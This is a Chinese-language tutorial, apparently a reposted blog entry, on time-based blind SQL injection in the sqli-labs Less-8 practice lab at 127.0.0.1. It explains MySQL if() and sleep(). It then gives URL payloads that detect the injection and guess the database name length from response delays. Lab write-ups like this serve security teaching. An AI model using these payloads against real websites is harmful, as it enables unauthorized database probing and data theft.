标签：Less sqli Less8 master sleep 盲注 延迟

Less-8和Less-5使用的是一样的布尔盲注，为了学习，这里我们使用时间盲注

这里使用到了mysql中的if语句,格式为if(条件,正确执行,错误执行)
实例如图:

sleep(秒速)，sleep函数可以执行延迟几秒。
在mysql中执行命令select sleep(5)，mysql会在五秒延迟后回显执行结果，时间注入就是利用if语句判断是否正确，通过返回到页面的延迟来判断我们的注入语句是否正确，和布尔注入类似

可以看到图片中有5秒的延迟时间。

判断是否存在时间注入

测试:http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and sleep(5) --+

页面存在延迟，说明纯在时间盲注

猜解当前数据库的长度

测试:http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if(length(database())=8,sleep(5),1) --+
如果当前数据库的长度为8，则延迟五秒，否者没有延迟

有延迟，说明当前数据库的长度为8
也可以将if语句的条件反过来
测试:http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if(length(database())=8,1,sleep(5)) --+
这句我们调整了条件的位置，是如果数据的长度为8，没有延迟，否者五秒延迟

剩下的步骤和sql盲注的步骤一样，只需要改一下if语句的判断条件就可以了。

标签：Less,sqli,Less8,master,sleep,盲注,延迟
来源： https://www.cnblogs.com/Junglezt/p/15874800.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。